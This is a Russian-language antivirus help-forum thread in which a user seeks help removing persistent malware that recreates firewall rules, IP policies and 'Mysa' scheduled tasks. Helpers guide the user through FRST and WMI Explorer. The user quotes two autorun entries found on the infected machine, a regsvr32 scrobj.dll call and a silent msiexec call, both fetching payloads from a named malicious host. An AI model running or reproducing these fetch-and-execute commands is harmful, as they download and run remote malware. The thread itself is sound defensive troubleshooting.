Помогите пожалуйста избавиться от вируса...

[REDACTED]

Здравствуйте, столкнулся с такой проблемой, компьютер перестали видеть другие устройства (как в локальной сети, так и в интернете). Очень долго мучился, но всё же добился устранения проблемы. Оказывается была создана локальная политика ip безопасности с какими-то списками ip фильтров, был включен брандмаузер, и в нем были созданы правила на блокировку и разблокировку портов, я это всё исправил, всё повыключал и поудалял. Но вдруг через пару часов все эти вещи вернулись назад: политика создалась, брандмаузер включился, правила брандмаузера создались (причём я выключал брандмаузер через слукжбы). Начал копать глубже, в планировщике задач нашёл странные задачи по типу "Mysa (1) (2) (3)", естессно их удалил, но они потом опять появились. На форумах вычитал, что это вирус, там советовали просканировать утилитой CureIt, она что-то нашла, что-то вылечила, но вскоре всё опять вернулось... Читал, что для каждого пользователя этот вирус удаляется индивидуально, нужно какие-то логи высылать и т. д.. Так вот, я готов выслать всё, что потребуется, только помогите удалить этот вирус навсегда...

[REDACTED]

Ссылка на архив с логами: https://yadi.sk/d/avdMZBbV3MCqfp

[Andrey,pro]

Женя15, здравствуйте и добро пожаловать на форум!

1.

• Сохраните прикрепленный файл fixlist.txt на Рабочем столе
  
• Теперь, пожалуйста, запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  
• Обратите внимание, что компьютер будет перезагружен.

ВНИМАНИЕ! Данный скрипт написан только для этого пользователя, использование его на другом компьютере может привести к неработоспособности ОС!

2. Скачайте, пожалуйста, WMI Explorer 2.0 по ссылке https://www.bleepingcomputer.com/download/wmi-explorer/
В нем, в ROOT\subscription найдите класс ActiveScriptEventConsumer, далее скопируйте скрипт, сохраните в блокноте и прикрепите в следующем сообщении. После этого данный класс можно удалить.

[REDACTED]

Спасибо за отклик, вот, отослал...
А по второму пункту, у меня в WMI Explorer 2.0 всё пусто...
Или я может что-то не так делаю? Можете объяснить поподробнее?

[Andrey,pro]

1. Запустите WMI Explorer и в левом верхнем углу нажмите кнопку Connect
2. В появившемся дереве найдите ROOT\subscription и дважды кликните по нему
3. в Classes появится ActiveScriptEventConsumer, кликните дважды по нему и в следующей панельке выберите вкладку Script и отметьте VBScript. Скопируйте содержимое в Блокнот и прикрепите к следующему сообщению.

[REDACTED]

Вот...


On Error Resume Next

Const wbemFlagReturnImmediately = &h10
Const wbemFlagForwardOnly = &h20

Set wshNetwork = WScript.CreateObject("WScript.Network")
strComputer = wshNetwork.ComputerName

strQuery = "SELECT * FROM ActiveScriptEventConsumer"

WScript.StdOut.WriteLine ""
WScript.StdOut.WriteLine "====================================="
WScript.StdOut.WriteLine "COMPUTER : " & strComputer
WScript.StdOut.WriteLine "CLASS    : ROOT\subscription:ActiveScriptEventConsumer"
WScript.StdOut.WriteLine "QUERY    : " & strQuery
WScript.StdOut.WriteLine "====================================="
WScript.StdOut.WriteLine ""

Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\ROOT\subscription")
Set colItems = objWMIService.ExecQuery(strQuery, "WQL", wbemFlagReturnImmediately + wbemFlagForwardOnly)

For Each objItem in colItems

    strCreatorSID = Join(objItem.CreatorSID, ",")
    WScript.StdOut.WriteLine "CreatorSID: " &  strCreatorSID
    WScript.StdOut.WriteLine "KillTimeout: " & objItem.KillTimeout
    WScript.StdOut.WriteLine "MachineName: " & objItem.MachineName
    WScript.StdOut.WriteLine "MaximumQueueSize: " & objItem.MaximumQueueSize
    WScript.StdOut.WriteLine "Name: " & objItem.Name
    WScript.StdOut.WriteLine "ScriptFilename: " & objItem.ScriptFilename
    WScript.StdOut.WriteLine "ScriptingEngine: " & objItem.ScriptingEngine
    WScript.StdOut.WriteLine "ScriptText: " & objItem.ScriptText
    WScript.StdOut.WriteLine ""

Next

[REDACTED]

Вот буквально пару минут назад, включился брандмаузер и всё остальное...

[REDACTED]

Вот лог: https://yadi.sk/i/Mqcsqeg93MD9UK

[REDACTED]

1. Запустите WMI Explorer и в левом верхнем углу нажмите кнопку Connect
2. В появившемся дереве найдите ROOT\subscription и дважды кликните по нему
3. в Classes появится ActiveScriptEventConsumer, кликните дважды по нему и в следующей панельке выберите вкладку Script и отметьте VBScript. Скопируйте содержимое в Блокнот и прикрепите к следующему сообщению.

Выше...

[Andrey,pro]

Женя15, в WMI Explorer во вкладке Instances имеются записи? Если да, то дважды кликните по нему и скопируйте содержимое поля StringText в следующее сообщение. 

[REDACTED]

Женя15, в WMI Explorer во вкладке Instances имеются записи? Если да, то дважды кликните по нему и скопируйте содержимое поля StringText в следующее сообщение.

Открываю, WMI, нажимаю присоединиться, и там вкладка Instances пуста, или нужно по какому-то пути пройти сначала?

[Andrey,pro]

1. Запустите WMI Explorer и в левом верхнем углу нажмите кнопку Connect
2. В появившемся дереве найдите ROOT\subscription и дважды кликните по нему
3. в Classes появится ActiveScriptEventConsumer, кликните дважды по нему и в следующей панельке выберите вкладку Instances, если имеются экземпляры, то дважды кликните по ниму и скопируйте содержимое поля StringText в следующее сообщение

[REDACTED]

1. Запустите WMI Explorer и в левом верхнем углу нажмите кнопку Connect
2. В появившемся дереве найдите ROOT\subscription и дважды кликните по нему
3. в Classes появится ActiveScriptEventConsumer, кликните дважды по нему и в следующей панельке выберите вкладку Instances, если имеются экземпляры, то дважды кликните по ниму и скопируйте содержимое поля StringText в следующее сообщение

Там пусто
Иногда появляются в автозагрузке две задачи:
Имя - Start.  Тип - REG_SZ. Значение - regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll.
Имя - Start1.  Тип - REG_SZ. Значение - msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q.
По этим процессам я так понял и загружается вирьё снова...
Но или я просто успеваю удалять эти строки из автозапуска или ещё что-то...
Как это заблокировать? Чтобы эти строки не появлялись?

[Ivanych]

Иногда появляются в автозагрузке две задачи:
Имя - Start.  Тип - REG_SZ. Значение - regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll.
Имя - Start1.  Тип - REG_SZ. Значение - msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q.
По этим процессам я так понял и загружается вирьё снова...
Но или я просто успеваю удалять эти строки из автозапуска или ещё что-то...
Как это заблокировать? Чтобы эти строки не появлялись?

Скачайте по этой ссылке программу и запустите с правами администратора,всё что найдёт программа удалите и проверьте опять.
http://www.comss.ru/page.php?id=1309
А эти ссылки по работе с этой программой
http://virtmachine.ru/chto-za-programma-adwcleaner.html
http://safezone.cc/threads/kratkaja-instrukcija-po-rabote-s-utilitoj-adwcleaner.22250/

[REDACTED]

Иногда появляются в автозагрузке две задачи:
Имя - Start.  Тип - REG_SZ. Значение - regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll.
Имя - Start1.  Тип - REG_SZ. Значение - msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q.
По этим процессам я так понял и загружается вирьё снова...
Но или я просто успеваю удалять эти строки из автозапуска или ещё что-то...
Как это заблокировать? Чтобы эти строки не появлялись?

Скачайте по этой ссылке программу и запустите с правами администратора,всё что найдёт программа удалите и проверьте опять.
http://www.comss.ru/page.php?id=1309
А эти ссылки по работе с этой программой
http://virtmachine.ru/chto-za-programma-adwcleaner.html
http://safezone.cc/threads/kratkaja-instrukcija-po-rabote-s-utilitoj-adwcleaner.22250/

Всё чисто, вот только как избавиться от появления учётной записи ASP.USER???